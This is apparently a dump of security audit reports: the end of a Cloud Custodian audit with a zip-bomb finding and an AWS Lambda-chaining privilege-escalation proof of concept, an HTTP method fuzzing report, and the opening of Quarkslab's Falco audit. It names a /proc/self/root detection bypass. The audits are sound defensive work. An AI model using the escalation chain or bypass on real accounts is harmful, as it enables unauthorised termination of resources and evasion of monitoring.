repository:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/e425311da975e9d03e69f4d33bfeec7ebe65f932/\ntools/c7n_policystream/policystream.py#L316-L345\n316 def delta_stream(self, target= 'HEAD ', limit=None,\n317 sort=pygit2.GIT_SORT_TIME | pygit2.\nGIT_SORT_REVERSE,\n318 after=None, before=None):\n319 \"\"\"Return an iterator of policy changes along a commit lineage\nin a repo.\n320 \"\"\"\n321 iftarget == 'HEAD ':\n322 target = self.repo.head.target\n323\n324 commits = []\n325 for commit in self.repo.walk(target, sort):\n326 cdate = commit_date(commit)\n327 log.debug(\n328 \"processing commit id:%s date:%s parents:%d msg:%s\",\n329 str(commit.id)[:6], cdate.isoformat(),\n330 len(commit.parents), commit.message)\n331 ifafter and cdate > after:\n332 continue\n333 ifbefore and cdate < before:\nCloud Custodian Security Audit 2023 39Cloud Custodian Security Audit 2023 17 apr 2024\n334 continue\n335 commits.append(commit)\n336 iflimit and len(commits) > limit:\n337 break\n338\n339 iflimit:\n340 self.initialize_tree(commits[limit].tree)\n341 commits.pop(-1)\n342\n343 for commit in commits:\n344 for policy_change in self._process_stream_commit(commit):\n345 yield policy_change\nAn attacker could obtain control over the Github repository in a number of ways; For example, the\nowner of the github repository may not be using proper configuration such as 2FA, and an attacker\ncould compromise the owners account and launch the attack. Alternatively, an attacker can pretend to\nbe a legitimate contributor over a longer time, make legitimate contributions, review pull requests\netc to build up credibility. The attacker could then choose to launch the attack at a the most lucrative\ntime. The attack could be against a competitor with the goal of achieving a time-advantage in certain\noperations such as research, business, trading or military operations. These are examples that illustrate\nthe Cloud Custodian does not control the data coming from the remote github repository, whereas\nfully untrusted users may be able to control it. As such, the data from the remote repositories can be\nfully untrusted.\ndelta_stream has an option to limit the number of iterations, however, this is off per default.\nMitigation\nWe recommend resolving all of the below: 1. Change the default limit parameter to a number instead\nofNone\nCloud Custodian Security Audit 2023 40Cloud Custodian Security Audit 2023 17 apr 2024\nPossible zip bomb from large S3 object\nSeverity Moderate\nStatus Reported\nid ADA-FASTIFY-2023-9\nComponent c7n\nCloud Custodian is susceptible to a possible Denial-of-Service from a maliciously crafted S3 object.\nThe attack would allow an attacker to exhaust memory of the machine and prevent Cloud Custodian\nfrom performing subsequent operations after the vulnerable code part has been invoked. The root\ncause is that Cloud Custodian decompresses compressesd S3 objects without hardening against large\nobjects. As such, an attacker with permissions to create S3 objects can create a malicious S3 object\nthat will cause Cloud Custodian to exhaust memory when Cloud Custodian resolves it.\nThe issue exists in two places in the Cloud Custodian URIResolver:\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n61ad56cc748e19230cf5794db1dfd3364bc3e66b/c7n/resolver.py#L44-L50\n44 def handle_response_encoding(self, response):\n45 ifresponse.info().get( 'Content-Encoding ') != 'gzip ':\n46 return response.read().decode( 'utf-8 ')\n47\n48 data = zlib.decompress(response.read(),\n49 ZIP_OR_GZIP_HEADER_DETECT).decode( 'utf8 '\n)\n50 return data\nhttps://github.com/cloud-custodian/cloud-custodian/blob/\n61ad56cc748e19230cf5794db1dfd3364bc3e66b/c7n/resolver.py#L52-L68\n52 ` ` `python\n53 def get_s3_uri(self, uri):\n54 parsed = urlparse(uri)\n55 params = dict(\n56 Bucket=parsed.netloc,\n57 Key=parsed.path[1:])\n58 ifparsed.query:\n59 params.update(dict(parse_qsl(parsed.query)))\n60 region = params.pop( 'region ', None)\n61 client = self.session_factory().client( 's3', region_name=region\n)\nCloud Custodian Security Audit 2023 41Cloud Custodian Security Audit 2023 17 apr 2024\n62 result = client.get_object(**params)\n63 body = result[ 'Body '].read()\n64 ifparams[ 'Key'].lower().endswith(( '.gz','.zip ','.gzip ')):\n65 return zlib.decompress(body, ZIP_OR_GZIP_HEADER_DETECT).\ndecode( 'utf-8 ')\n66 elif isinstance(body, str):\n67 return body\n68 else :\n69 return body.decode( 'utf-8 ')\nA denial-of-service scenario can arise purposefully or accidentally; An attacker can specifically craft a\nmalicious S3 object that allocates a lot of memory when Cloud Custodian decompresses it, or the AWS\nadmin can accidentally set no limit to the object, and a large one will accidentally be created during\nnormal business operations and exhaust memory. At the time of this audit, an S3 object can be up to\n5TB in size which will be enough to exhaust memory in the majority of use cases.\nMitigation\n\u2022Decompress in chunks.\nCloud Custodian Security Audit 2023 42Cloud Custodian Security Audit 2023 17 apr 2024\nPrivilege escalation through chained Lambda functions in AWS\nSeverity Moderate\nStatus Reported\nid ADA-CC-2023-10\nComponent c7n\nCloud Custodian is susceptible to a privilege escalation issue on AWS from an underlying prioritization\nof privileges in AWS between user privileges and Lambda privileges. This is an issue in AWS that Cloud\nCustodian inherits. We consider the impact of the issue to be High, however, Cloud Custodian may\nopinionatedly reject the root cause of this issue to exist in Cloud Custodian. The reason for this is that\nAWS users are exposed to the same issue.\nThe issue exists because users in AWS inherit the privileges of the Lambda functions that the users\nhave privileges to invoke, even if the user does not have privileges to carry the actions against the\nresources that the Lambda functions have privileges to. For example, consider a scenario where a user\nhas privileges to read resources of type \u201cA\u201d , and invoke Lambda function \u201cB\u201d , and Lambda function \u201cB\u201d\nhas privileges to create resources of type \u201cA\u201d . In this case, the user will also have privileges to create\nresources of type \u201cA\u201d , even if the cluster admin has not excplicitly assigned those privileges.\nBelow we exmplify the issue with a user that has read-only privileges against EC2 instances, access to\nthe cloud shell, read-only access to Lambda functions and read-only access to IAM. In addition, the\nuser has permissions to invoke Lambda functions. The same example Cloud Custodian deployment\nhas a function called Invoker() which has permissions to invoke another Lambda function called\nterminate_instance .terminate_instance has privileges to terminate EC2 instances - a\nprivilege that the user does not have.\nIn this case, the user has permissions to terminate EC2 instances, even though the cluster admin has\nnot assigned these to the user.\nCluster assets and permissions\nUser Permissions\n\u2022AWS managed permissions:\nCloud Custodian Security Audit 2023 43Cloud Custodian Security Audit 2023 17 apr 2024\nFigure 4: Privilege escalation illustration\n\u2013AmazonEC2ReadOnlyAccess\n\u2013AWSCloudShellFullAccess\n\u2013AWSLambda_ReadOnlyAccess\n\u2013IAMReadOnlyAccess\n\u2022Custom permissions:\n\u2013lambda:InvokeFunction\n\u2013lambda:InvokeAsync ##### Lambda Function Invoker ###### Permissions\n\u2022Custom permissions:\n\u2013lambda:InvokeFunction\n\u2013lambda:InvokeAsync ##### Lambda Function \u201cterminate_instance\u201d ###### permissions\n\u2022Custom permissions:\n\u2013ec2:terminate_instance\nCode for lambda function Invoker If the users attempts to run a Cloud Custodian policy directly to\nterminate an EC2 instance, they are denied with the following error:\n1botocore.exceptions.ClientError: An error occurred (\nUnauthorizedOperation) when calling the TerminateInstances operation\n: You are not authorised to perform this operation.\nCloud Custodian Security Audit 2023 44Cloud Custodian Security Audit 2023 17 apr 2024\nHowever, by invoking the chain of the two Lambda functions, the user can still terminate EC2 instances.\nThe user can invoke the Lambda function Invoker which invokes terminate_instance which\nterminates an EC2 instance. Consider the following proof concept:\nCode for lambda function Invoker\n1import json\n2import boto3\n3\n4client = boto3.client( 'lambda ')\n5\n6def lambda_handler(event, context):\n7 response = client.invoke(\n8 FunctionName= 'arn:aws:lambda:eu-north-1:[ACCOUNTID]:function:\nterminate_instance ',\n9 InvocationType= 'RequestResponse ',\n10 Payload=json.dumps(inputForInvoker)\n11 )\n12\n13 print(json.load(response[ 'Payload ']))\nCode for lambda function terminate_instance\n1import json\n2import boto3\n3\n4def lambda_handler(event, context):\n5 ec2 = boto3.client( 'ec2', region_name= 'eu-north-1 ')\n6 ec2.terminate_instances(InstanceIds=[ '[INSTANCEID] '])\nProof of concept\nAssume there is one EC2 instance in the cloud account. With tag:Name = t1 and instance id = i-0080\na65c233f313fd .\nFigure 5: Instance List\nIn this situation, the user \u201cTest\u201d has a limited set of permissions as stated above. He/she cannot execute\na Cloud Custodian policy directly to EC2 in order to terminate an instance, because he/she only has\nread-only access to the EC2 resources. The following Cloud Custodian policy will fail.\nCloud Custodian Security Audit 2023 45Cloud Custodian Security Audit 2023 17 apr 2024\n1policies:\n2 - name: ec2-delete-marked\n3 resource: ec2\n4 filters:\n5 - \"tag:Name\": \"t1\"\n6 actions:\n7 - type: terminate\n8 force: true\nThe error message from the above Cloud Custodian policy execution is as follows.\n1botocore.exceptions.ClientError: An error occurred (\nUnauthorizedOperation) when calling the TerminateInstances operation\n: You are not authorised to perform this operation.\nHowever it is found that the user Test could still be able to terminate an instance with a detour path.\nThe user Test can run a Cloud Custodian policy that invokes a lambda function \u201cInvoker\u201d , where\n\u201cInvoker\u201d has permission and logic to invoke another lambda function \u201cterminate_instance\u201d . If \u201ctermi-\nnate_instance\u201d does have the EC2 instance termination permission. The policy to invoke \u201cInvoker\u201d\ncould end up terminating an instance in EC2, given that neither the user \u201cTest\u201d nor the lambda function\n\u201cInvoker\u201d has the EC2 instance termination right. Cloud Custodian did not mitigate this kind of attack.\nThe following is a policy for invoking the lambda function \u201cInvoker\u201d\nCloud custodian policy that user Test could deploy and terminate an instance\n1policies:\n2 - name: invoke\n3 resource: ec2\n4 filters:\n5 - \"tag:Name\": \"t1\"\n6 actions:\n7 - type: invoke-lambda\n8 function: Invoker\nThe following result shows that the policies has run successfully.\n12023-10-09 18:08:22,470: custodian.commands:DEBUG Loaded file invoke.\nyml. Contains 1 policies\n22023-10-09 18:08:22,486: custodian.aws:DEBUG using default region:eu-\nnorth-1 from boto\n32023-10-09 18:08:23,089: custodian.output:DEBUG Storing output with <\nLogFile file://./invoke/custodian-run.log>\n42023-10-09 18:08:23,100: custodian.policy:DEBUG Running policy:invoke\nresource:ec2 region:eu-north-1 c7n:0.9.29\n52023-10-09 18:08:23,100: custodian.cache:DEBUG expiring stale cache\nentries\n62023-10-09 18:08:23,101: custodian.resources.ec2:DEBUG Using cached c7n\n.resources.ec2.EC2: 1\nCloud Custodian Security Audit 2023 46Cloud Custodian Security Audit 2023 17 apr 2024\n72023-10-09 18:08:23,101: custodian.resources.ec2:DEBUG Filtered from 1\nto 1 ec2\n82023-10-09 18:08:23,101: custodian.policy:INFO policy:invoke resource:\nec2 region:eu-north-1 count:1 time:0.00\n92023-10-09 18:08:23,706: custodian.policy:INFO policy:invoke action:\nlambdainvoke resources:1 execution_time:0.60\n102023-10-09 18:08:23,708: custodian.output:DEBUG metric:ResourceCount\nCount:1 policy:invoke restype:ec2 scope:policy\n112023-10-09 18:08:23,708: custodian.output:DEBUG metric:ApiCalls Count:2\npolicy:invoke restype:ec2\nThe instance is being terminated.\nFigure 6: Terminated Instance\nImpact\nAll Cloud Custodian can be impacted by this, but will not be by default when using Cloud Custodian.\nUsers need will need to configure their Cloud Custodian deployment in a similar manner exemplified\nabove. Users will not easily accidentally configure their deployments in such a manner, however, the\nmore complex the deployment regardingnumber of users users, permissions and Lambda functions,\nthe more likely a mistake can happen that allows for this privilege escalation. As such, users must\nenable a configuration that allows this privilege escalation.\nThe issue can result in escalation to the highest level of privileges that the cluster admin has enabled,\nhowever, this is highly dependent on a particular Cloud Custodian deployment. As such, users should\nconsider this on a case-by-case basis.\nCloud Custodian Security Audit 2023 47" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-16 11_43_17.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin 164.90.157.161-withUsernamePassword/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-16 11:43:17\nTime taken 00:05:57.491\nTotal scans performed: 2042\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Falco", - "file_name": "SECURITY_AUDIT_2023_01_23-01-1097-LIV.pdf" - }, - "content": [ - { - "data": "Falco Security Audit\nReport\nReference 23-01-1097-LIV\nVersion 1.0\nDate 2023/01/16\nQuarkslab SAS\n10 boulevard Haussman\n75009 Paris\nFranceContents\n1 Project Information 1\n2 Executive summary 2\n2.1 Disclaimer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2\n2.2 Findings summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2\n3 Context and scope 4\n3.1 Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4\n3.2 Scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4\n3.3 Audit settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5\n4 Discovery and state of the art 6\n4.1 Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\n4.2 State of the art . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6\n5 Threat model 7\n5.1 A note on threat actors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8\n6 Static analysis 9\n6.1 Automated static analyzers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\n6.1.1 Cppcheck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9\n6.1.2 Infer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12\n6.1.3 CodeQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14\n6.1.4 Scan-Build . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15\n6.1.5 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17\n6.2 Manual review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\n6.2.1 Issues with readlink . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18\n6.2.2 Checks on sensitive functions . . . . . . . . . . . . . . . . . . . . . . . . . 23\n6.2.3 Third-party dependencies version . . . . . . . . . . . . . . . . . . . . . . . 24\n6.2.4 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24\n7 Dynamic analysis 25\n7.1 Fuzzing the rules parser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25\n7.2 Fuzzing the event processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28\n7.2.1 Using libprotobuf-mutator . . . . . . . . . . . . . . . . . . . . . . . . . . . 29\n7.2.2 Using syzkaller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35\n7.2.3 Using the scap file format . . . . . . . . . . . . . . . . . . . . . . . . . . . 41\n7.3 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44\n8 Conclusion 45\nGlossary 46\nBibliography 47A Severity Classification 48\nB Infer report extracts 49\nC Scan-Build experimentations 54\nD Exploiting and debugging readlink issues 56\nE AFL++ persistent mode boilerplate 58\nF Fuzzing with libprotobuf-mutator 591 Project Information\nDocument history\nVersion Date Details Authors\n1.0 2023/01/16 Initial Version Victor Houal & Laurent Laubin & Mah\u00e9\nTardy\nQuarkslab\nContact Role Contact Address\nFr\u00e9d\u00e9ric Raynal CEO fraynal@quarkslab.com\nRamtine Tofighi Shirazi Project Manager mrtofighishirazi@quarkslab.com\nVictor Houal R&D Engineer Apprentice vhoual@quarkslab.com\nLaurent Laubin R&D Engineer llaubin@quarkslab.com\nMah\u00e9 Tardy R&D Engineer mtardy@quarkslab.com\nFalco maintainers\nContact Company Contact Address\nFrederico Araujo IBM frederico.araujo@ibm.com\nJason Dellaluce Sysdig jasondellaluce@gmail.com\nMauro Ezequiel Moltrasio Red Hat mmoltras@redhat.com\nLeonardo Grasso Sysdig me@leonardograsso.com\nLuca Guerra Sysdig luca.guerra@sysdig.com\nTeryl Taylor IBM terylt@ibm.com\nMichele Zuccala Sysdig michele@zuccala.com\nOSTIF\nContact Role Contact Address\nDerek Zimmer President and Executive Director derek@ostif.org\nAmir Montazery Managing Director amir@ostif.org\nRef: 23-01-1097-LIV 1 Quarkslab SAS2 Executive summary\nThe goal of the audit was to assist the Falco maintainers to increase their security posture using\nstatic and dynamic analysis. Falco maintainers required an emphasis on fuzzing. To that end,\nQuarkslab\u2019sengineersresearchedmultipletopicstoproviderecommendationsandrelevantadvice.\nIn addition, Quarkslab\u2019s engineers assessed the code in order to find some issues, using automated\ntesting tools, fuzzing, or just by manually reviewing the code base.\nThis report describes the steps and research conducted by Quarkslab\u2019s engineers on static analysis\nand fuzzing. In addition, readers can refer to Section 2.2 for the summary of findings that were\nfound during the audit.\nThe report starts with introductory sections, the next Section 3, describes the context and scope\nthat were decided for the audit, then Section 4 presents how the auditors got familiar with the\nproject and the state-of-the-art research that was conducted, accompanied by a bibliography.\nAfterwards, Section 5 presents the threat model that was created, with Section 6 and Section 7\npresenting the static and dynamic analysis resulting from the threat modeling. The section on\nstatic analysis presents static analyzers that were tested on the project with their results, while the\nsection on dynamic analysis illustrates and explains the research conducted on how fuzz-testing\nwas applied to various parts of the project.\n2.1 Disclaimer\nThis report reflects the work and results obtained within the duration of the audit on the specified\nscope (see Section 3.2) and as agreed between the OSTIF, Falco maintainers, and Quarkslab.\nTests are not guaranteed to be exhaustive and the report does not ensure the code is bug or\nvulnerability free.\n2.2 Findings summary\nThe following table synthesizes the various findings that were uncovered during the audit. The\nseverity classification given as informative, low, and medium, reflects a relative hierarchy between\nthe various findings of this report (see the table in Appendix A). It depends on the threat model\nand security properties considered.\nID Description Category Severity\nMEDIUM 1 Potential buffer overflow due to not null\nterminated output of readlink inlib-\nscap/scap_proc_file_rootBuffer overflow Medium\nLOW 1 Memory leak on errorstructure in lib-\nscap/engine/bpf/scap_bpf.c:513Memory Leak Low\nLOW 2 Resource leak on pfile inlib-\nscap/engine/kmod/scap_kmod.c:67Resource Leak Low\nRef: 23-01-1097-LIV 2 Quarkslab SASID Description Category Severity\nLOW 3 Memory leak on handlestructure in lib-\nscap/scap.c:146Memory Leak Low\nLOW 4 Memory leak on pAdapterInfo structure in\nlibscap/windows_hal.c:342Memory Leak Low\nLOW 5 Multiple unchecked return value from mal-\nloc,callocandreallocNull dereference Low\nLOW 6 Multiple unchecked return value from lo-\ncaltime ,sinsp_threadinfo::get_fd_-\ntableandscap_write_proclist_begin\nthat can return NullptrNull dereference Low\nLOW 7 Double free in libscap/scap.c function\nscap_openDouble free Low\nLOW 8 Garbage return value from stack in lib-\nsinsp/sinsp.cppGarbage return value Low\nLOW 9 Fournullterminationsofbufferswrittenout\nof range by one in libscap/scan_fds.cBuffer overflow Low\nINFO 1 Multiple bad handling of realloc return\nvalue inlibsinsp/filterchecks.cppMemory Leak Info\nINFO 2 Missingva_end() afterva_copy() in test\nfilesinsp_with_test_input.hIncorrect handling of\nvariadic macrosInfo\nINFO 3 Returned heap allocated buffer resolved\nafter being deallocatedReturn pointer on freed\nmemoryInfo\nINFO 4 MultiplepotentialNullpointerdereferences\nin macro HASH_ADD_INT64Null dereference Info\nINFO 5 Resource leak in libsinsp example lib-\nsinsp/examples/test.cppResource leak Info\nINFO 6 Dangerous construct in a vforked process in\nlibscap/engine/gvisor/runsc.cppIncorrect use of vfork Info\nINFO 7 Buffer overflow with not null terminated\noutput of readlink in debug code in lib-\nsinsp/parsers.cppBuffer overflow Info\nINFO 8 Return value in various usage of readlink\nnot checked which could lead to write to a\ndifferent fileUnchecked return value Info\nINFO 9 Multiple crashes in the parsing of scap files\nand event buffer with malformed filesNull dereference Info\nRef: 23-01-1097-LIV 3 Quarkslab SAS3 Context and scope\n3.1 Context\nFalco\u2019s README introduces the project like that:\nThe Falco Project, originally created by Sysdig, is an incubating CNCF open-source\ncloud-native runtime security tool. Falco makes it easy to consume kernel events and\nenrich those events with information from Kubernetes and the rest of the cloud-native\nstack. Falco can also be extended to other data sources by using plugins. Falco has a\nrich set of security rules specifically built for Kubernetes, Linux, and cloud-native. If a\nrule is violated in a system, Falco will send an alert notifying the user of the violation\nand its severity.\nFalco monitors system calls to secure a system, by:\n\u2022Parsing the Linux system calls from the kernel at runtime.\n\u2022Asserting the stream against a powerful rules engine.\n\u2022Alerting when a rule is violated.\nThe project ships with a default set of rules ready to be consumed by end-users to secure their\nKubernetes clusters. However, users can write their own rules using a syntax created by the\nproject for specific needs.\nHistorically, Falco was the first runtime security project to join CNCF as an incubation-level project.\n3.2 Scope\nThe scope of this audit was mainly the userspace part of Falco, distributed in the falcosecurity/falco\nandfalcosecurity/libs repositories on GitHub. Refer to Table 3.1 and 3.2 for URLs and commit\nhashes. The kernel module was investigated although it was not the focus of the audit. The\ndependencies and the plugins of Falco were left out of scope. The eBPF drivers of Falco also were\nnot investigated.\nThe Falco team requested assistance on:\n\u2022building fuzzers for security-relevant areas;\n\u2022building a threat model;\n\u2022using and adding automatic static analysis in their pipeline;\n\u2022looking for improper usage of cryptography;\n\u2022manually searching for vulnerability, with an emphasis on memory safety.\nQuarkslab proposed a multi-step approach:\n\u2022discovery of the project, its documentation, build system, architecture and codebase;\nRef: 23-01-1097-LIV 4 Quarkslab SAS\u2022threat modeling;\n\u2022static code review, including automatic and manual reviews;\n\u2022dynamic testing and fuzzing.\n3.3 Audit settings\nSee below Table 3.1 and 3.2 for the versions used to conduct this audit. Most of the work was\nconducted on the libs repository, thus falco repository is needed to compile the final binary.\nProject falco\nRepository https://github.com/falcosecurity/falco\nCommit hash 44d1c1eb65031b8895b154139a1cc7bb545df60a\nCommit date 2022/10/19\nTag 0.33.0\nTable 3.1: falco version references\nProject libs\nRepository https://github.com/falcosecurity/libs\nCommit hash 74eec76d2c1dbba66a37db227d25a6b41987c1a6\nCommit date 2022/10/13\nTag 0.9.0\nTable 3.2: libs version references\nRef: 23-01-1097-LIV 5 Quarkslab SAS4 Discovery and state of the art\n4.1 Discovery\nFalco is overall well-documented and easy to integrate. The documentation is pretty comprehen-\nsive, well-written, and easy to follow. For example, to build and run Falco from the source, the\nofficial documentation is great [1]. A tutorial to run Falco on a minikube cluster is also available.1\nWe had no major difficulty to get familiar with the project and understand the cmake setup, the\nonly difficulty could be the high number of dependencies that Falco relies on.\n4.2 State of the art\nTo begin, an audit of Falco was conducted by Cure53 in mid-2019 [2]. They performed a manual\nanalysis of the source, some dynamic analysis, and tried to bypass the default set of rules. They\nfound some interesting bypass, configuration issues and crashes.\nWe noted that almost all the issues from the audit and security advisories were fixed except for\na symlink file bypass. Cure53 discussed this topic in their report, giving the example of using\n/proc/self/root to bypass detection on a specific path, like /etc/shadow . Open discussions are\nstill happening on how to prevent these issues [3].\nSpecifically on bypasses, Mark Manning, at the time at NCC Group, wrote about it at the end\nof 2019 [4]. Then, Brad Geesaman, at the time founding Darkbit, published a bypass article a\nyear after [5], September 2020. Then a Falco maintainer from Sysdig, Leonardo Di Donato, did a\npresentationatKubeConEurope2021Virtualonthesubject[6]. FinallyaresearcheratBlackberry,\nShay Berkovich presented a talk virtually at 